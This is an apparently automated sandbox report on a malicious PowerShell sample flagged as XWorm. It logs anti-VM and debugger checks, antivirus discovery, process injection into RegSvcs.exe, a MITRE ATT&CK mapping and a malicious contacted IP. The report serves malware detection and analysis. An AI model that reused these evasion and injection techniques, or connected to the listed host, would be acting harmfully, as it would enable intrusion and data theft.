      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
      Query firmware table information (likely to detect VMs)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4367Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5496Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4017Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5816Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep time: -17524406870024063s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: Amcache.hve.0.drBinary or memory string: VMware
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
      Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: RegSvcs.exe, 00000004.00000002.3874168788.00000000013A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: Amcache.hve.0.drBinary or memory string: vmci.sys
      Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.0.drBinary or memory string: VMware20,1
      Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Injects a PE file into a foreign processes
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E4A008Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0" Jump to behavior
      Source: RegSvcs.exe, 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected XWorm
      Source: Yara matchFile source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 64, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected XWorm
      Source: Yara matchFile source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 64, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
      Windows Management Instrumentation      		1
      DLL Side-Loading      		212
      Process Injection      		1
      Disable or Modify Tools      		OS Credential Dumping241
      Security Software Discovery      		Remote Services11
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		241
      Virtualization/Sandbox Evasion      		LSASS Memory2
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		1
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)212
      Process Injection      		Security Account Manager241
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive1
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets1
      System Network Configuration Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing      		Cached Domain Credentials2
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync23
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      NLXwvLjXPh.ps116%ReversingLabsScript.Trojan.Heuristic
      NLXwvLjXPh.ps112%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.microsoft.co(0%Avira URL Cloudsafe
      92.255.57.1550%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0035.t-0009.t-msedge.net
      		13.107.246.63
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        92.255.57.155true
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2389124323.000001FF02CAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.microsoft.co(powershell.exe, 00000000.00000002.2410805237.000001FF7F6AB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000000.00000002.2389124323.000001FF0227D000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2389124323.000001FF02CAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000000.00000002.2400723112.000001FF117A6000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://upx.sf.netAmcache.hve.0.drfalse
                          		high
                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.2389124323.000001FF01411000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2389124323.000001FF01411000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2389124323.000001FF01638000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                92.255.57.155
                                		unknownRussian Federation
                                		42253TELSPRUtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1577165
                                Start date and time:2024-12-18 08:14:07 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 39s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:NLXwvLjXPh.ps1
                                renamed because original name is a hash value
                                Original Sample Name:e02595a8630c7da338e486f3502ecde5cac8940ede0c5fb058aa1d02f6150859.ps1
                                Detection:MAL
                                Classification:mal100.troj.evad.winPS1@9/13@0/1
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 94%
                                • Number of executed functions: 67
                                • Number of non-executed functions: 3
                                Cookbook Comments:
                                • Found application associated with file extension: .ps1
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.63, 20.190.181.6, 4.175.87.197
